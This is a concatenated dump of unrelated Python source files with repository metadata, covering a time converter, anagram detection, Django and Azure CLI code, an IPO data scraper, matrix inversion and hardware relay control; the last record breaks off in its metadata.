"LicenseRef-scancode-unknown-license-reference"
]
| permissive | Unathi-Skosana/qiskit-aqua | feb8231a1719a0e73aaae0f29df0246b3dc9419c | e13f66eda6d8b819a6f132319a2bac819941f6b1 | refs/heads/master | 2020-11-24T15:39:29.645914 | 2020-08-07T22:36:23 | 2020-08-07T22:36:23 | 255,790,533 | 2 | 0 | Apache-2.0 | 2020-04-15T03:06:06 | 2020-04-15T03:06:06 | null | UTF-8 | Python | false | false | 508 | py | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
| [
"[email protected]"
]
| |
72391153bf1b5a4b9500125fb9c2eab3123cfda6 | bd7e89c8e55a106af3dab4cf036309ec8a3e05e2 | /Onsite/Week1/stick_of_truth_1.py | c50e9491405a6de5ff35dd5cf1ee6b39d36a44b4 | []
| no_license | wiput1999/PrePro60-Python | 758ec60addaa61ff27ea9bc46474eaf244f5ab58 | d26dcadcd71896589f992a69cbff711ec0576f59 | refs/heads/master | 2021-09-15T19:52:10.899257 | 2018-06-09T12:52:42 | 2018-06-09T12:52:42 | 89,356,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | """ [Stick of Truth - 1] Time Converter """
def main():
""" Convert time """
# Parallel Hour
para_hr = int(input())
# Parallel Minute
para_min = int(input())
# Parallel Second
para_sec = int(input())
pre_result = (para_hr * 50 * 29) + (para_min * 29) + para_sec
pre_result *= 14
# Real World Second
real_sec = pre_result % 60
pre_result //= 60
# Real World Minute
real_min = pre_result % 60
pre_result //= 60
# Real World Hour
real_hr = pre_result % 24
pre_result //= 24
# Real World Day
real_day = pre_result
print("%02d:%02d:%02d" %(real_hr, real_min, real_sec))
print("Day : %d" %real_day)
main()
| [
"[email protected]"
]
| |
a4bb39a9334acf1bf77a42f83b0699981a29f9c7 | 781e2692049e87a4256320c76e82a19be257a05d | /assignments/python/anagram/src/374.py | c539bcd239aa7680c066a136c90fe90dc92c4ca3 | []
| no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 308 | py | def detect_anagrams(reference, word_list):
reference = reference.casefold()
ref_list = sorted(reference)
detect_anagram = lambda w1 : w1 != ref and sorted(w1) == ref_list
return [word
for word
in word_list
if detect_anagram(word.casefold())]
| [
"[email protected]"
]
| |
bc3fdf3b58a0e51964c0ff34acad6251cbc52f5f | 7a604a685f9729cd691a7c81f12f2f8a297744de | /feedly/default_settings.py | 2cacfbb53bcb1181a10700376b241fc1d96dd34f | [
"BSD-3-Clause"
]
| permissive | vmaliwal/Feedly | 16b3e6ba90646dcbce863f6a2b5613b832a21c0e | ec9c8655b4b831cda22d12afa7e39dc382a86b4e | refs/heads/master | 2021-01-20T22:55:09.042922 | 2013-08-08T13:39:34 | 2013-08-08T13:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py |
FEEDLY_NYDUS_CONFIG = {
'CONNECTIONS': {
'redis': {
'engine': 'nydus.db.backends.redis.Redis',
'router': 'nydus.db.routers.redis.PrefixPartitionRouter',
'hosts': {
0: {'prefix': 'default', 'db': 2, 'host': 'localhost', 'port': 6379},
12: {'prefix': 'feedly:', 'db': 0, 'host': 'localhost', 'port': 6379},
13: {'prefix': 'feedly:', 'db': 1, 'host': 'localhost', 'port': 6379},
14: {'prefix': 'notification:', 'db': 3, 'host': 'localhost', 'port': 6379},
}
},
}
}
FEEDLY_CASSANDRA_HOSTS = ['localhost']
| [
"[email protected]"
]
| |
b035543cf5b0996c159636f236d14a00d492ff0f | fcc33e6a8b8af0ac1d69bd9815b786318c4b2d4b | /tests/testapp/migrations/0002_config_template.py | 11ad23505a0fcdf0eab9bd30b3843fd68d91b43c | [
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | PabloCastellano/openwisp-users | 47a0c7b286422effaa57c192ee7a3e687afeb90f | d95cb7a1e30ef69b948216c54931ddf7a4a215fc | refs/heads/master | 2022-07-08T03:02:35.622736 | 2020-04-15T22:47:39 | 2020-04-15T22:47:39 | 256,520,208 | 0 | 0 | BSD-3-Clause | 2020-04-17T14:07:29 | 2020-04-17T14:07:28 | null | UTF-8 | Python | false | false | 510 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-14 15:14
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('testapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='config',
name='template',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='testapp.Template'),
),
]
| [
"[email protected]"
]
| |
47c521124fd2c1605e9cacaaffd327c383c76a12 | 8dfe4b53fae92795405d789d52148d1291836afa | /.metadata/.plugins/org.eclipse.core.resources/.history/b0/40309ba33381001515feb230dc0120b2 | fe95f4e3a0d5f62b004a6c2ef67cbc23ae59821a | []
| no_license | ymyjohnny/python | e07c54a88954e090cf3d30a4c6f6ac46353063fb | b483fd55e577d4dcceb5762bddf833df23874f3a | refs/heads/master | 2021-01-10T01:10:19.038424 | 2019-07-02T02:40:23 | 2019-07-02T02:40:23 | 45,223,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | #!/usr/bin/python
#coding=utf-8
'''
Created on 2015-11-2
@author: ymy
'''
import os
dirname = '/tmp'
def allfile(dirname):
for base,dirs,files in os.walk(dirname):
for file in files:
filename = os.path.join(base,file)
filenames = filename.append()
#print filenames
def grep_a(file,str):
pass
allfile(dirname) | [
"[email protected]"
]
| ||
966d55e40c38e5b665058075f090351806b1d9a6 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210129095952.py | ea98f703e481dd4caf491af6ddbe4c82c9af507b | []
| no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,945 | py | # 东方财富网 首发申报
from datetime import datetime,timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def date_gen():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text,'html.parser')
dateList = [i.text for i in soup.findAll('option')]
yield dateList
def get_eastmoneyData(dateList):
query = {'type': 'NS',
'sty' : 'NSFR',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '1',
'rt' : '53721774'
}
main_data = []
for date in dateList:
query['fd'] = dateList
# start = datetime.strptime('2017-01-05','%Y-%m-%d').date()
# while start < datetime.today().date():
# query['fd'] = start
url = base_url + urlencode(query)
# yield url
# start += timedelta(days=7)
rs = requests.get(url,headers=headers)
if rs.text == '':
continue
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
main_data.extend(data)
time.sleep(2)
temp = [i.split(',') for i in main_data]
columns = ['会计师事务所','保荐代表人','保荐机构','xxx','律师事务所','日期','所属行业','板块','是否提交财务自查报告',
'注册地','类型','机构名称','签字会计师','签字律师','时间戳','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df = df[['机构名称', '类型', '板块', '注册地', '保荐机构','保荐代表人', '律师事务所', '签字律师','会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业','日期','xxx', '时间戳', '保荐机构','文件链接']]
df = df[df['板块'] != '创业板']
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',index=False,encoding='utf-8-sig')
return df
def get_meetingData():
meetingInfo = []
for marketType in ['2','4']: # 2 为主板, 4 为中小板
query = {'type': 'NS',
'sty' : 'NSSH',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : marketType,
'rt' : '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = ['时间戳','yyy','公司代码','机构名称','详情链接','申报日期','上会日期','申购日期','上市日期','9','拟发行数量','发行前总股本','发行后总股本','13','占发行后总股本比例','当前状态','上市地点','主承销商','承销方式','发审委委员','网站','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df['详情链接'] = df['公司代码'].apply(lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[['机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期','上会日期', '申购日期', '上市日期', '主承销商','承销方式', '9', '发行前总股本','发行后总股本','13','占发行后总股本比例','发审委委员','网站','公司代码','yyy','时间戳', '简称', '详情链接','文件链接']]
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv'.format(i),index=False,encoding='utf-8-sig')
return df
def get_zzscData(dateList):
zzsc_dict = {}
for date in dateList:
query = {'type': 'NS',
'sty' : 'NSSE',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '500',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '4',
'stat':'zzsc',
'fd' : date,
'rt' : '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
continue
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
time.sleep(2)
zzsc = pd.DataFrame(zzsc_dict.items(),columns = ['机构名称','决定终止审查时间'])
zzsc.to_csv('C:/Users/chen/Desktop/IPO_info/eastmoney_zzsc.csv',encoding='utf-8-sig',index=False)
return zzsc
def eastmoney_cleanUP():
east_money = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_raw_data.csv')
east_money.replace({'是否提交财务自查报告':' '},'是')
east_money.replace({'是否提交财务自查报告':'不适用'},'是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*','',regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司','',regex=True)
east_money = east_money[east_money['板块'] != '创业板']
# east_money.sort_values(['机构名称','类型','受理日期'],ascending=[True, True,True],inplace=True)
# east_money.to_csv('C:/Users/chen/Desktop/IPO_info/pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset =['机构名称','类型'], keep = 'first', inplace = True)
east_money.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv',encoding='utf-8-sig',index=False)
return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
'''
主板、中小板 = {'机构名称':'',
'简称':'',
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'[日期]',
'已反馈':'[日期]',
'预先披露更新':'[日期]',
'发审会':{'中止审查':'[日期]',
'已上发审会,暂缓表决':'[日期]',
'已提交发审会讨论,暂缓表决:'[日期]',
'已通过发审会':'[日期]'},
'终止审查':'[日期]',
'上市日期':'[日期]',
'保荐机构':'',
'律师事务所':,
'会计师事务所':'',
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':'[链接]'
}
'''
shzb = {} # 上海主板
szzxb = {} # 深圳中小板
all_data = {} # 总数据
ekk = cleaned_easymoney_df.values.tolist()
for i in ekk:
if i[0] not in all_data:
all_data[i[0]] = {'机构名称':i[0],
'简称':i[15],
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'',
'已反馈':'',
'预先披露更新':'',
'发审会':{'中止审查':'',
'已上发审会,暂缓表决':'',
'已提交发审会讨论,暂缓表决':'',
'已通过发审会':''},
'终止审查':'',
'上市日期':'',
'保荐机构':i[4],
'律师事务所':i[6],
'会计师事务所':i[8],
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':''
}
if i[1] == '已受理':
all_data[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
all_data[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
all_data[i[0]]['预先披露更新'] = i[12]
elif i[1] == '已通过发审会':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] == '已提交发审会讨论,暂缓表决':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] in ['已提交发审会讨论,暂缓表决','已上发审会,暂缓表决','中止审查']:
all_data[i[0]]['其他'] = {i[1]:i[12]} | [
"[email protected]"
]
| |
aa237d039e97b9f01880f9bee5d1a2994a3a66ea | 94318d8fa492445adb79547da369f141d8a80133 | /scripts/plot_detection_rate.py | 80df4af4d2dc49e02ca82f87f4f91f7f365b7f49 | []
| no_license | dragontt/geneoscopy_dev | 630fbaca230dfd009667694ed8bb4a222e597eed | a5cf26ed0dc949c3d7af48d765864aff95edbe9d | refs/heads/master | 2021-01-12T12:53:16.696478 | 2017-05-26T18:44:45 | 2017-05-26T18:44:45 | 69,477,315 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,061 | py | #/usr/bin/python
import numpy as np
import sys
import matplotlib.pyplot as plt
##Color choice:
#507cb2 <- blue
#73aa53 <- green
#7f4d91 <- purple
filename = sys.argv[1]
color = sys.argv[2]
f = open(filename, 'r')
lines = f.readlines()
f.close()
labels = []
values = []
for i in range(1, (len(lines)-1)):
line = lines[i].strip().split('\t')
labels.append(line[0])
values.append(float(line[2].strip('%')))
indx = np.arange(len(labels)) + .1
fig, ax = plt.subplots(figsize=(4, 2.5), dpi=150)
plt.bar(indx, values, .5, color='#'+color)
plt.ylabel('Sensitivity (%)')
plt.xticks(indx+.25, labels, rotation=40)
plt.tick_params(axis=u'x', which=u'both',length=0)
plt.ylim([0, 100])
plt.gcf().subplots_adjust(bottom=0.35, left=.2)
# plt.show()
rects = ax.patches
for rect, value in zip(rects, values):
height = rect.get_height()
annot_text = ax.text(rect.get_x() + rect.get_width()/2, height - 12, ('%d%%' % value),
ha='center', va='bottom', color='white')
annot_text.set_fontsize(9)
plt.savefig(filename.strip('.txt')+'.pdf', fmt='pdf')
| [
"[email protected]"
]
| |
965f0f0575173c3e422ccf531b6ee00c9c26153a | 18f0ad99e21e2e35126f8c3c28079d358fa2129a | /Adafruit_STEMMA_Relay/code.py | 90a3ebc494b98b85606ab958b6d7eed82af95a86 | [
"MIT"
]
| permissive | ladyada/Adafruit_Learning_System_Guides | 9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f | 6d76801878cbf65132ccea950dc47ae842c73dcd | refs/heads/master | 2023-08-20T20:30:42.910576 | 2022-01-10T20:28:11 | 2022-01-10T20:28:11 | 115,837,894 | 13 | 2 | MIT | 2020-03-31T23:23:45 | 2017-12-31T02:34:47 | C | UTF-8 | Python | false | false | 225 | py | import time
import board
import digitalio
relay = digitalio.DigitalInOut(board.A1)
relay.direction = digitalio.Direction.OUTPUT
while True:
relay.value = True
time.sleep(1)
relay.value = False
time.sleep(1)
| [
"[email protected]"
]
| |
74f58ecbee8a351e9afa5d6b12189026de789cce | 03e3138f99f275d15d41a5c5bfb212f85d64d02e | /source/res/scripts/client/gui/Scaleform/daapi/view/meta/BCMessageWindowMeta.py | 0012af4c374027efc9feaad96ad7d03c1dfb6253 | []
| no_license | TrenSeP/WorldOfTanks-Decompiled | e428728e7901146d0b599d02c930d70532232a97 | 1faa748acec1b7e435b657fd054ecba23dd72778 | refs/heads/1.4.1 | 2020-04-27T08:07:49.813023 | 2019-03-05T17:37:06 | 2019-03-05T17:37:06 | 174,159,837 | 1 | 0 | null | 2019-03-06T14:33:33 | 2019-03-06T14:24:36 | Python | UTF-8 | Python | false | false | 757 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BCMessageWindowMeta.py
from tutorial.gui.Scaleform.pop_ups import TutorialDialog
class BCMessageWindowMeta(TutorialDialog):
def onMessageRemoved(self):
self._printOverrideError('onMessageRemoved')
def onMessageAppear(self, rendrerer):
self._printOverrideError('onMessageAppear')
def onMessageDisappear(self, rendrerer):
self._printOverrideError('onMessageDisappear')
def onMessageButtonClicked(self):
self._printOverrideError('onMessageButtonClicked')
def as_setMessageDataS(self, value):
return self.flashObject.as_setMessageData(value) if self._isDAAPIInited() else None
| [
"[email protected]"
]
| |
cbf6d2082e39aa257ea9fbe33b054caa5d9f3c3b | 7c74ceb9f8addcc0816d012e0b84b174b96e0def | /src/azure-cli/azure/cli/command_modules/aro/commands.py | d260980c3351e0d1f012b5f449a5127298355e87 | [
"MIT",
"LGPL-2.1-only",
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
]
| permissive | microsoft/azure-cli | 4c826290e7a6f6bd27da3829b05e4f02ff6dc8d9 | 9ba64b33f6f78e2c3e42f8a147f59484300e8779 | refs/heads/dev | 2023-08-31T08:51:39.526556 | 2022-11-28T19:08:23 | 2022-11-28T19:08:23 | 370,900,439 | 7 | 7 | MIT | 2023-08-01T23:34:50 | 2021-05-26T03:59:41 | Python | UTF-8 | Python | false | false | 1,505 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
from azure.cli.command_modules.aro._client_factory import cf_aro
from azure.cli.command_modules.aro._format import aro_show_table_format
from azure.cli.command_modules.aro._format import aro_list_table_format
from azure.cli.command_modules.aro._help import helps # pylint: disable=unused-import
def load_command_table(self, _):
aro_sdk = CliCommandType(
operations_tmpl='azure.mgmt.redhatopenshift.operations#OpenShiftClustersOperations.{}', # pylint: disable=line-too-long
client_factory=cf_aro)
with self.command_group('aro', aro_sdk, client_factory=cf_aro) as g:
g.custom_command('create', 'aro_create', supports_no_wait=True)
g.custom_command('delete', 'aro_delete', supports_no_wait=True, confirmation=True)
g.custom_command('list', 'aro_list', table_transformer=aro_list_table_format)
g.custom_show_command('show', 'aro_show', table_transformer=aro_show_table_format)
g.custom_command('update', 'aro_update', supports_no_wait=True)
g.wait_command('wait')
g.custom_command('list-credentials', 'aro_list_credentials')
| [
"[email protected]"
]
| |
abb7a8d52d3b436acb78715b3bb73aea337c4351 | cc4d8bfef5395c0e3076e9a37a40864554e9099a | /cli.py | 6d64d4987ace1d007791275ed73818dfd6440490 | [
"MIT"
]
| permissive | NiklasRosenstein/yassg | 99ce9cd327d7e4a72b94066a6e1d1c693b581b33 | 511ca5a1eb76b8fb314c45de6ac85a845b98243c | refs/heads/master | 2021-01-01T04:49:03.758342 | 2017-11-15T13:02:52 | 2017-11-15T13:02:52 | 97,255,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # Copyright (c) 2017 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import click
import toml
import os
import subprocess
import yassg from './yassg.py'
@click.command()
@click.argument('build_dir', default='build')
@click.option('-C', '--config', default=None,
help='Configuration file. Defaults to yassg.toml or .config/yassg.toml')
@click.option('--commit', is_flag=True,
help='Create a new commit after the build. Use only when the build '
'directory is set-up as a git worktree.')
@click.option('--push', is_flag=True,
help='Commit and push after the build. Use only when the build '
'directory is set-up as a git worktree.')
def main(build_dir, config, commit, push):
"""
Yet another static site generator.
"""
if not config:
config = 'yassg.toml'
if not os.path.isfile(config):
config = '.config/yassg.toml'
config_filename = config
with open(config) as fp:
config = toml.load(fp)
if 'content-directory' in config:
content_dir = os.path.join(os.path.dirname(config_filename), config['content-directory'])
else:
content_dir = 'content'
root = yassg.RootPage(yassg.pages_from_directory(content_dir, recursive=True))
root.sort()
renderer = yassg.Renderer(root, config)
renderer.render(build_dir)
if commit or push:
print('Creating new commit in "{}" ...'.format(build_dir))
subprocess.call(['git', 'add', '.'], cwd=build_dir)
subprocess.call(['git', 'commit', '-m', 'Update'], cwd=build_dir)
if push:
print('Pushing to "{}" ...'.format(build_dir))
subprocess.call(['git', 'push', 'origin', 'gh-pages'], cwd=build_dir)
if require.main == module:
main()
| [
"[email protected]"
]
| |
708ac5d15ba5bd4ff5de1105d484cf04d937744f | 70922de165319283d640821fd42ea1806da402c0 | /math/0x05-advanced_linear_algebra/4-inverse.py | 072f6b067b57f8f8f4c3b6c36868f390e22e15db | []
| no_license | ikki2530/holbertonschool-machine_learning | bdd8152d575a99281e2cce105cf87442ec07f2fb | 0b56aa0e92d65d4a5832cc994769834fbcfbe0ac | refs/heads/main | 2023-07-07T00:49:03.675328 | 2021-08-11T10:27:56 | 2021-08-11T10:27:56 | 317,352,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,506 | py | #!/usr/bin/env python3
"""
calculates the inverse of a matrix.
"""
def determinant(matrix):
"""
Calculates the determinant of a matrix.
- matrix is a list of lists whose determinant should be calculated.
Returns: the determinant of matrix
"""
n = len(matrix)
if n == 1 and len(matrix[0]) == 0 and type(
matrix) == list and type(matrix[0]) == list:
return 1
if n == 0:
raise TypeError("matrix must be a list of lists")
if type(matrix) != list:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) != list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a square matrix")
if len(matrix) == 1 and len(matrix[0]) == 1:
return matrix[0][0]
if n == 2:
a = matrix[0][0]
b = matrix[0][1]
c = matrix[1][0]
d = matrix[1][1]
det = a * d - (b * c)
return det
all_minors = []
mult = matrix[0]
signo = 1
signos = []
newm = []
temp = []
cofactorv = 0
# take the minors
for k in range(n):
for i in range(n):
for j in range(n):
if i != cofactorv and j != k:
temp.append(matrix[i][j])
if temp:
newm.append(temp.copy())
temp = []
if newm:
all_minors.append(newm)
signos.append(signo)
signo = signo * -1
newm = []
# add determinant
suma = 0
for i in range(n):
suma = suma + (signos[i] * mult[i] * determinant(all_minors[i]))
return suma
def minor(matrix):
"""
Calculates the minor matrix of a matrix.
- matrix is a list of lists whose minor matrix should be calculated.
Returns: the minor matrix of matrix
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
newm = []
temp = []
minors = [[0 for j in range(n)] for i in range(n)]
# find the minor matrices
for h in range(n):
for w in range(n):
for i in range(n):
for j in range(n):
if i != h and j != w:
temp.append(matrix[i][j])
if temp:
newm.append(temp.copy())
temp = []
if newm:
# Add a new minor
minors[h][w] = determinant(newm)
newm = []
return minors
def cofactor(matrix):
"""
Calculates the cofactor matrix of a matrix.
- matrix is a list of lists whose cofactor matrix should be calculated.
Returns: the cofactor matrix of matrix.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
cofactor = minor(matrix)
sign = -1
for i in range(n):
for j in range(n):
cofactor[i][j] = cofactor[i][j] * (sign**(i+j))
return cofactor
def adjugate(matrix):
"""
Calculates the adjugate matrix of a matrix.
- matrix is a list of lists whose adjugate matrix should be calculated.
Returns: the adjugate matrix of matrix.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
cf = cofactor(matrix)
adj = [[0 for j in range(n)] for i in range(n)]
# transpose of cofactors matrix
for i in range(n):
for j in range(n):
adj[j][i] = cf[i][j]
return adj
def inverse(matrix):
"""
Calculates the inverse of a matrix.
- matrix is a list of lists whose inverse should be calculated.
Returns: the inverse of matrix, or None if matrix is singular.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1 / matrix[0][0]]]
adj = adjugate(matrix)
det = determinant(matrix)
if det == 0:
return None
inverse = [[0 for j in range(n)] for i in range(n)]
for i in range(n):
for j in range(n):
inverse[i][j] = adj[i][j] / det
return inverse
| [
"[email protected]"
]
| |
72f7059f397a28a6fc5d98863a2b760954f5192a | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/701.py | e899850bc93a963d05e10c0c43026ddae3581bf4 | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | N = int(raw_input())
for p in range(N):
c, f, x = [float(x) for x in raw_input().split()]
ps = 2
sc = 0
mn = 1e18
while True:
if x/ps+sc > mn: break
mn = x/ps+sc
sc = sc + c/ps
ps = ps + f
print "Case #%d: %.7f" % (p+1, mn) | [
"[email protected]"
]
| |
0f0f877c97a35b12e70b671b4474566eb9ea5061 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_11384.py | b95a73f029ffac05ff28a15dd300aebce41f7043 | []
| no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | # Pythonic way to find any item from a list within a string
any(name in line for name in illegal_names)
| [
"[email protected]"
]
| |
ebb12756eedd2b1951d254e6c61ebf9cc3fccc37 | 24a377bcf06aac43eb099f5ce2383e5da07ddadc | /analysis/set_num_runs.py | 7a02d3330ac65acc6e51f1470227da9a0bc78537 | []
| no_license | AlJohri/nulaundry | 223f0cf4b5c4a46e083512b35f4cddc5879d39ab | be61f72dd69cc633458d3e147a1593b2e6bf01c4 | refs/heads/master | 2020-05-19T14:15:44.561527 | 2015-04-15T04:21:29 | 2015-04-15T04:21:29 | 33,854,316 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | from firebase import firebase
firebase = firebase.FirebaseApplication('https://aljohri-nulaundry.firebaseio.com', None)
machines = firebase.get("/machines", None)
for machine_id, machine in machines.iteritems():
num_runs = len(machine['runs'].values()) if machine.get('runs') else 0
print "Machine %s has %d runs" % (machine_id, num_runs)
firebase.put(url='/machines/%s' % machine_id, name="num_runs", data=num_runs) | [
"[email protected]"
]
| |
2c1729733b5515b33837a25e1c54ba55a64c4d70 | 744c3b66611b08782fcdd9d66261c4d55b00d426 | /examples/pybullet/gym/pybullet_envs/minitaur/agents/baseline_controller/gait_generator.py | 61bd849acf0af82aee1c3cb503e4381a69ee2973 | [
"Zlib"
]
